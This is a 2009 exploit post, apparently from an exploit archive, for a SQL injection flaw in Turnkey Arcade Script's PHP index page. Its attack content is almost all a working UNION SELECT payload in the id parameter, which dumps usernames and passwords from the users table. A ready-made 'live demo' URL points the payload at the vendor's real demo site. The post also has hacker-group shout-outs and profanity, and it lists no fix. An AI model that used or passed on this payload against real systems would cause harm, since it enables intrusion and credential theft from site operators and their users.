Turnkey Arcade Script (id) Remote SQL Injection Vulnerability

2009-08-25 14:55:29

==============================================================================
## Hackteach.OrG ##


/ ___ )( __ )/ ___ )
\/ ) || ( ) |\/ ) |
/ )| | / | / )
/ / | (/ /) | / /
/ / | / | | / /
/ (_/\| (__) | / (_/\
(_______/(_______)(_______/

==============================================================================
[»] ~ Note : Hacker R0x Lamerz Sux !
==============================================================================
[»] Arcad site Script <== Remote SQL Injection Vulnerability
==============================================================================
[»] my home: [ Hackteach.org ]
[»] Script: [ Arcad site Script ]
[»] Language: [ PHP ]
[»] Download: [ http://www.turnkeyarcade.com/ ]
[»] Founder: [ Red-D3v1L < [email protected] > ]
[»] Gr44tz to: [ All member Hackteach.org/cc - Str0ke - sp3x ]
[»] Fuck To : [ Anti-trust << Big Big Big Lamer << ]
########################################################################

===[ Exploit SQL ]===

[»] Path/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--


[»] L1v3 d3m0 : http://www.turnkeyarcade.com/demo/index.php?action=browse&id=-7+union+select+1,2,concat(password,0x3e,username),4+from+users--

Author: Red-D3v1L <-

###########################################################################

#

Fixes

No fixes

In order to submit a new fix you need to be registered.